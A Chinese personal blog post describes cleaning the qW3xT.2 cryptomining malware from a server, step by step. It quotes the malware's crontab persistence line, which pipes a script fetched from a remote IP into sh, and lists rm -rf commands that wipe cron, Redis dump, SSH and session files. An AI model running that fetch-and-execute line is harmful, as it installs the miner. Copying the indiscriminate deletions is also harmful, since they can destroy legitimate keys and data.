記一次解決伺服器病毒qW3xT.2經歷
先是在伺服器出現警告,說可能是挖礦的病毒。剛開始沒當回事,當把這個病毒百度之後發現,很嚴重吶。
好了,開始幹活。
第一步:
連結地址 :https://blog.csdn.net/weixin_41228949/article/details/81501753
然鵝,沒有成功。。。。。。(成功了大概半分鐘,之後又活了)呵呵呵
第二步:
找出入侵IP
/var/spool/cron/crontabs
*/15 * * * * curl -fsSL http://149.56.106.215:8000/i.sh | sh
curl -fsSL http://149.56.106.215:8000/i.sh
第三步:
將/root/.ssh/所有檔案幹掉(不認識或者看著不爽的,具體自己判斷,我是全都幹掉,心情不好。。。。。。)
第四步:繼續幹掉root檔案和dump.rdb檔案
rm –rf /var/spool/cron/root
/var/spool/cron/crontabs/root
rm –rf /tmp/dump.rdb
rm –rf /usr/local/redis/bin/ dump.rdb
rm –rf /var/spool/cron/ dump.rdb
第五步:在繼續幹掉sess開標頭檔案(我這有16個,心情不好都刪了。。。。。。)
rm –rf /tmp/sess_* (共有16個file) <內容均為visit_item_1|i:1;>
第六步:
最後在kill -9 xxx 這個病毒以及刪除它。
不過我還是把這個IP加入了黑名單。
到此就結束。。。。。。
多說一句,我兩臺伺服器被搞了,看個人運氣吧總體來說,不過還有一個連結還是很不錯的,在這裡找到的靈感。(其實感覺是“模仿”的,哈哈)。
最後貼出連結:https://blog.csdn.net/zhanghan18333611647/article/details/65632827
=========================我是分割線=============================================
這是第一次清除此病毒,半月之後又出現此問題,流氓
再次貼出第二次清除經歷:::::https://blog.csdn.net/qq_39424981/article/details/82461129